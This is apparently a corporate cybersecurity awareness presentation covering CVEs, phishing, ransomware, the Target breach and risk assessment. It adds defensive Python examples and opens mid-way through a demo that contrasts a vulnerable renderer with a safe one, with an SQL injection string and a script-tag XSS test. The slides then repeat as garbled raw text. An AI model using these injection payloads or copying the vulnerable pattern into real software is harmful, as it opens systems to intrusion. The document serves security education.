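        "script_tag_survives": "<script>" in render_comment_vulnerable(xss_comment),
        "script_tag_escaped": "<script>" not in render_comment_safe(xss_comment),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The parameterized version still accepts the string `alice' --`; it simply looks for a user literally named that and finds none. That is the whole fix: the input is never parsed as part of the query.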
Common Vulnerabilities and Exposures (CVE) – A catalog of publicly known vulnerabilities, maintained by MITRE and sponsored by the U.S. Department of Homeland Security, in which each entry receives a CVE identifier. In CVE terminology a vulnerability is a known flaw in a system or software that gives an attacker direct access; an exposure is a known flaw that gives an attacker indirect access, which may let them gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers using a vulnerability that had been known, and fixed by the vendor, for months or years but never patched at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that the software or system provider has not yet fixed. Zero days are the most difficult to protect against and detect because there is no vendor knowledge or patch to rely on; defenses fall back on least privilege, network segmentation and monitoring rather than patching.
Advanced Persistent Threat (APT) – A set of stealthy and continuous hacking processes, often orchestrated by a person or group targeting a specific entity.
Dark Web / Darknet – Websites on the internet that are not reachable through normal search engines or browsing. Darknet sites require special software such as Tor (The Onion Router), which helps keep users anonymous. Darknet sites host several illegal activities, such as black-market sales of stolen PII or credit card data and botnet rentals. Bitcoin is the usual currency for these transactions.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances recorded on a public ledger (the blockchain) that is replicated across the network's nodes and verified, along with every Bitcoin transaction, by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: miners solve a computationally difficult puzzle to discover a new block, add it to the blockchain and receive a reward of a few bitcoins. The network periodically adjusts the difficulty of the puzzle (the amount of computing power needed to solve it) so that blocks keep being found at roughly the same rate as more mining power joins.
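A toy version of the mining puzzle described above, added here as an example and not part of the presentation. It keeps Bitcoin's double SHA-256 and leading-zero-bits target but shrinks the difficulty so it finishes in well under a second; the `retarget` rule is a deliberate simplification of Bitcoin's every-2016-blocks adjustment, and the previous-block hash and transaction payload are constructed:

```python
import hashlib
import time


def block_hash(prev_hash, data, nonce):
    """Bitcoin hashes the block header twice with SHA-256; this does the same over a
    simplified header of (previous hash, data, nonce)."""
    header = f"{prev_hash}|{data}|{nonce}".encode()
    return hashlib.sha256(hashlib.sha256(header).digest()).hexdigest()


def meets_target(h, difficulty_bits):
    """A hash solves the puzzle when its value is below 2^(256 - difficulty_bits),
    i.e. when it begins with at least difficulty_bits zero bits."""
    return int(h, 16) >> (256 - difficulty_bits) == 0


def mine(prev_hash, data, difficulty_bits, max_attempts=50_000_000):
    """Try nonces until the hash meets the target. Returns (nonce, hash, attempts).
    Expected attempts are about 2^difficulty_bits: each extra bit doubles the work,
    which is where the 'massive amount of computing power' comes from."""
    for nonce in range(max_attempts):
        h = block_hash(prev_hash, data, nonce)
        if meets_target(h, difficulty_bits):
            return nonce, h, nonce + 1
    raise RuntimeError("no solution within max_attempts")


def verify(prev_hash, data, nonce, difficulty_bits):
    """Anyone can check a claimed solution with a single hash: hard to find, cheap to verify."""
    return meets_target(block_hash(prev_hash, data, nonce), difficulty_bits)


def retarget(difficulty_bits, observed_seconds, target_seconds):
    """Simplified difficulty adjustment (an assumption of this toy, not Bitcoin's exact
    formula): blocks arriving much faster than the target mean more hashing power joined,
    so raise the difficulty; much slower, lower it."""
    if observed_seconds < target_seconds / 2:
        return difficulty_bits + 1
    if observed_seconds > target_seconds * 2:
        return max(1, difficulty_bits - 1)
    return difficulty_bits


if __name__ == "__main__":
    genesis = "0" * 64  # constructed previous-block hash
    payload = "alice pays bob 1 BTC"  # constructed transaction data
    for bits in (8, 12, 16):
        start = time.perf_counter()
        nonce, h, attempts = mine(genesis, payload, bits)
        print(f"{bits:2d} bits: nonce={nonce:7d} attempts={attempts:7d} "
              f"time={time.perf_counter() - start:.3f}s hash={h[:20]}...")
```

Run it and watch the attempt count roughly quadruple each time four bits are added; real Bitcoin difficulty is many orders of magnitude beyond what this loop can reach, which is the point of the puzzle.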
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment, following the link or handing over credentials.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive). Examples:
• "CEO" email to the treasurer (business email compromise)
• HR phishing for employee data
• W-2 data phishing (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of "external sender" banner or subject tag, so that a message claiming to come from a colleague but arriving from outside is visibly marked as such.
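The external-mail label described above is easy to automate at the mail gateway, and the same hook is the natural place to catch the whaling pattern from the spear-phishing slide (an executive's name on an outside address). The following is an added example in Python, not code from the presentation; the company domain `example.com`, the executive names and the three sample messages are all hypothetical:

```python
from email.utils import parseaddr

# Assumed company domain and the executives most worth impersonating (hypothetical names).
INTERNAL_DOMAINS = {"example.com"}
EXECUTIVE_NAMES = {"Jane Doe", "John Roe"}
EXTERNAL_TAG = "[EXTERNAL]"


def _domain(address):
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def _normalise_name(display_name):
    # Case, extra whitespace, a trailing "(title)" and word order do not matter:
    # "JANE DOE", "Jane  Doe (CEO)" and "Doe Jane" all compare equal.
    name = display_name.split("(")[0].replace(",", " ").lower()
    return " ".join(sorted(name.split()))


def screen_inbound(headers):
    """headers: dict of raw header values. Returns (subject_to_deliver, warnings).
    Mirrors the external-mail banner most companies add, then goes one step further
    and checks the two most common spear-phishing tells: an executive's display name
    on an external address, and a Reply-To that silently redirects the conversation."""
    warnings = []
    subject = headers.get("Subject", "")
    display_name, from_addr = parseaddr(headers.get("From", ""))
    from_domain = _domain(from_addr)

    if from_domain not in INTERNAL_DOMAINS:
        if not subject.startswith(EXTERNAL_TAG):
            subject = f"{EXTERNAL_TAG} {subject}"
        executives = {_normalise_name(n) for n in EXECUTIVE_NAMES}
        if _normalise_name(display_name) in executives:
            warnings.append(f"display name '{display_name}' matches an executive "
                            f"but the sender is external ({from_addr})")

    _, reply_addr = parseaddr(headers.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        warnings.append(f"replies go to {reply_addr}, not to the From domain")

    return subject, warnings


# Constructed sample messages, not real mail.
SAMPLES = [
    {"From": "Bob Builder <bob@example.com>", "Subject": "Q3 numbers"},
    {"From": "Jane Doe <jane.doe.ceo@gmail.example>", "Subject": "Need a wire sent today"},
    {"From": "billing@partner.example", "Reply-To": "ap@lookalike.example",
     "Subject": "Updated bank details for invoice 4471"},
]

if __name__ == "__main__":
    for msg in SAMPLES:
        subject, warnings = screen_inbound(msg)
        print(subject)
        for w in warnings:
            print("   WARNING:", w)
```

The banner alone only helps users who read it; the two warnings are what a gateway can act on (quarantine, or route to the security team) without waiting for a human to notice.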
MALWARE
Malware is short for malicious software. It is a broad term that covers computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving attackers a way to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest form of malware to dominate the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking (encrypting) the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 systems across 150 countries (it included a worm component, so it spread between machines on its own rather than relying on each user to open an attachment)
COMMON CYBER ATTACK PATTERNS
Common attack patterns account for the vast majority of documented breaches.
• 78% of all breaches result from these five attack patterns:
  - Web app attacks
  - POS intrusions
  - Privilege misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top two alone
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can undo an organization's other security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target the systems that capture customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a way into an organization's POS systems
• Retail and accommodation (hospitality) sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most of these breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of these breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common forms of crimeware
• Crimeware is typically introduced through:
  - Email attachments
  - Cross-site scripting from a visited website
  - Email links
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target data breach – 70 million PII records of customers and 40 million credit cards stolen
• Sony attack – Malware attack that erased over half of the company's servers and PCs and released four unreleased movies and over 45,000 social security numbers
• Yahoo data breaches (2013/2014) – An August 2013 breach exposed the PII of 1 billion users; a 2014 breach exposed 500 million users; additional data loss was reported in 2016
• Prepaid card/ATM scheme (2013) – $45 million stolen (worldwide)
• Bangladesh Bank (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability in the electronic submission process to gain further access to Target's internal network
• Reconnoitered the environment and obtained domain administrator access
• Attackers then worked their way through various servers, using a scanner to detect which other servers they could reach from their current location, working around firewalls and other defenses
• Gained access to a server that contained a SQL database and downloaded 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off from the rest of the network)
• Attackers then went on the darknet to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers installed malware on certain POS servers that scanned memory and saved off credit card data (card data is in the clear in memory at the moment of the transaction, which is why memory scraping works even when data is encrypted on disk and in transit)
• Attackers then copied the credit card files to another server that had outbound FTP access and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovation in technology
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN DEPTH
Defense in depth rests on three legs: people, processes and technology.
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually, or whenever significant changes to the environment occur
• Stinnett uses Microsoft's STRIDE threat modeling (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege) to semi-qualitatively measure cybersecurity risk: identify, estimate and prioritize information security risks
Process steps:
  - Identification of assets
  - Asset locations
  - Classification of assets
  - Threat modeling
  - Calculated risk results
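The five steps listed above, carried through end to end in an added Python example (this is illustration written for this page, not Stinnett's own tooling). The asset inventory, the classification weights and the 1 to 5 likelihood and impact ratings are constructed; the risk formula, likelihood x impact x classification weight, is one reasonable semi-qualitative scoring and is an assumption of the example rather than the firm's method:

```python
from collections import defaultdict

STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information disclosure",
          "Denial of service", "Elevation of privilege")

# Classification weight (assumed): the more sensitive the asset, the more a threat against it counts.
CLASS_WEIGHT = {"public": 1, "internal": 2, "confidential": 3, "restricted": 4}

# Steps 1-3 of the slide: identify assets, record where they live, classify them.
# Hypothetical inventory, not a real client's.
ASSETS = {
    "Payroll database": {"location": "on-premises data center", "classification": "restricted"},
    "Customer portal":  {"location": "cloud (hosted)",           "classification": "confidential"},
    "Marketing site":   {"location": "cloud (hosted)",           "classification": "public"},
}

# Step 4, threat modeling: for each asset, rate each relevant STRIDE threat.
# Likelihood and impact on a 1-5 scale (the semi-qualitative part); constructed ratings.
THREATS = [
    ("Payroll database", "Information disclosure", 3, 5),
    ("Payroll database", "Elevation of privilege", 2, 5),
    ("Customer portal",  "Spoofing",               4, 3),
    ("Customer portal",  "Tampering",              2, 4),
    ("Marketing site",   "Tampering",              4, 2),
    ("Marketing site",   "Denial of service",      4, 1),
]


def score_threats(threats=THREATS, assets=ASSETS):
    """Step 5, calculated risk results: risk = likelihood x impact x classification weight,
    ranked highest first so the list doubles as a remediation priority order."""
    rows = []
    for asset, category, likelihood, impact in threats:
        if category not in STRIDE:
            raise ValueError(f"not a STRIDE category: {category}")
        if not (1 <= likelihood <= 5 and 1 <= impact <= 5):
            raise ValueError("likelihood and impact must be rated 1-5")
        weight = CLASS_WEIGHT[assets[asset]["classification"]]
        rows.append({
            "asset": asset,
            "location": assets[asset]["location"],
            "threat": category,
            "risk": likelihood * impact * weight,
        })
    return sorted(rows, key=lambda r: r["risk"], reverse=True)


def risk_by_asset(rows):
    """Roll the per-threat scores up to one number per asset, highest first: the view
    management usually wants, while the per-threat list is what the engineers work from."""
    totals = defaultdict(int)
    for r in rows:
        totals[r["asset"]] += r["risk"]
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    ranked = score_threats()
    for r in ranked:
        print(f"{r['risk']:3d}  {r['asset']:18s} {r['threat']:24s} ({r['location']})")
    print()
    for asset, total in risk_by_asset(ranked):
        print(f"{total:3d}  {asset}")
```

Note what the weighting does: the marketing site has the highest likelihood ratings in the table, yet it lands at the bottom, because a defaced public page costs far less than payroll data leaving the building. That is the point of classifying assets before modeling threats.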
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is understanding the company's information assets:
• What value do the assets have?
  - Credit card data
  - Employee or customer records
  - Bank accounts
  - Intellectual property
  - Trade secrets
  - Insider knowledge
• Who would want the data?
• Where is the data located?
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design against a commonly accepted framework (or frameworks)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring its IT devices are properly updated (patched) to the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and therefore cannot adequately assess their patch management process
User and Administrator Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as far as possible. Within the IT department, a failure of least privilege results in multiple individuals and IDs with access to, and/or knowledge of, higher-level functions in the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to missing patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe products, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (length, character requirements and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are properly segregated from the systems they protect (ransomware that can reach the backups encrypts them too)
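The device inventory and patch-risk fixes above, turned into a ranking an IT team could actually run, as an added Python example that is not part of the presentation. Host names, dates and the internet-facing multiplier are constructed assumptions; the one figure taken from the slides is the finding that most exploitation happens more than a year after the patch exists, which is why the report flags that threshold explicitly:

```python
from datetime import date

# Constructed device inventory (hypothetical hosts; not a real client's network).
# "patched_on" is the vendor release date of the newest patch actually installed.
DEVICES = [
    {"host": "web-01",       "internet_facing": True,  "software": "web server",       "patched_on": date(2016, 6, 1)},
    {"host": "fileshare-02", "internet_facing": False, "software": "operating system", "patched_on": date(2017, 9, 15)},
    {"host": "hr-app-03",    "internet_facing": False, "software": "java runtime",     "patched_on": date(2016, 1, 10)},
    {"host": "kiosk-04",     "internet_facing": False, "software": "operating system", "patched_on": date(2017, 10, 10)},
]

# Constructed vendor data: release date of the latest available patch per package.
LATEST_PATCH = {
    "web server":       date(2016, 7, 15),
    "operating system": date(2017, 10, 10),
    "java runtime":     date(2017, 4, 18),
}

ONE_YEAR = 365
INTERNET_FACING_MULTIPLIER = 3   # assumed weighting; tune to your own risk appetite


def patch_backlog(devices=DEVICES, latest=LATEST_PATCH, today=None):
    """Return every device missing a vendor patch, ranked by priority (highest first).
    Exposure is counted from the day the vendor published the fix, because that is the
    day attackers could start reverse-engineering it; internet-facing hosts are weighted
    up because they are reachable without any other foothold."""
    today = today or date.today()
    rows = []
    for d in devices:
        vendor_date = latest.get(d["software"])
        if vendor_date is None:
            # Unknown software means unknown risk: surface it rather than silently skipping,
            # since "we do not know what is on the network" is itself the failure named above.
            rows.append({"host": d["host"], "days_unpatched": None, "over_a_year": None,
                         "priority": float("inf"), "note": "no vendor patch data; cannot assess"})
            continue
        if d["patched_on"] >= vendor_date:
            continue  # current; nothing to do
        days = (today - vendor_date).days
        rows.append({
            "host": d["host"],
            "days_unpatched": days,
            "over_a_year": days > ONE_YEAR,
            "priority": days * (INTERNET_FACING_MULTIPLIER if d["internet_facing"] else 1),
            "note": "internet facing" if d["internet_facing"] else "internal",
        })
    return sorted(rows, key=lambda r: r["priority"], reverse=True)


if __name__ == "__main__":
    for r in patch_backlog(today=date(2017, 10, 27)):   # date of the presentation
        print(f"{r['host']:13s} days_unpatched={r['days_unpatched']!s:>5} "
              f"over_a_year={r['over_a_year']!s:5} priority={r['priority']:>6} {r['note']}")
```

Feed it a real inventory export and the vendor release dates from your patch tool and the same ranking falls out; the hosts with no matching vendor record are the ones to chase first, because they are the devices nobody knew to patch.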
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
copyStinnett amp Associates LLC3
Personal Introduction
Graduated from TU with a Bachelorrsquos Degree in Accounting and MIS
Dad of Four Sophie (17) Zoe (15) Sadie (12) Rocco (8)
Started Career as an ERP Systems Implementation Consultant then spent 10 years with PricewaterhouseCoopers (PwC)
Joined Stinnett amp Associates as a Principal in 2006
Has his CPA CIA and CISA certifications
Significant experience in Business Process and IT Consulting IT and Application Controls and Risk Management
Industries include energy with heavy upstream focus manufacturing and telecommunications
Background
Interests
Golf four kids limit my opportunities
Did I mention the four kids Interests are limited
The Great Circus that is our Political System
Vegas during March Madness
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key. Paying does not guarantee a working key; tested backups kept separate from the network are the primary recovery control.
• Bitcoin is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 systems across 150 countries; it included a worm component that spread across networks through a Windows SMB vulnerability Microsoft had patched two months earlier (MS17-010), so unpatched machines were infected without anyone opening an attachment
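The behaviour described above (many files rewritten as ciphertext by one process in a short time) is also what a defender can look for. The Python below is an added example written for this page, not part of the presentation; the entropy and burst thresholds, the process names and the file-write events are constructed, and in production the events would come from an EDR agent or file-audit log rather than a list.

```python
import math
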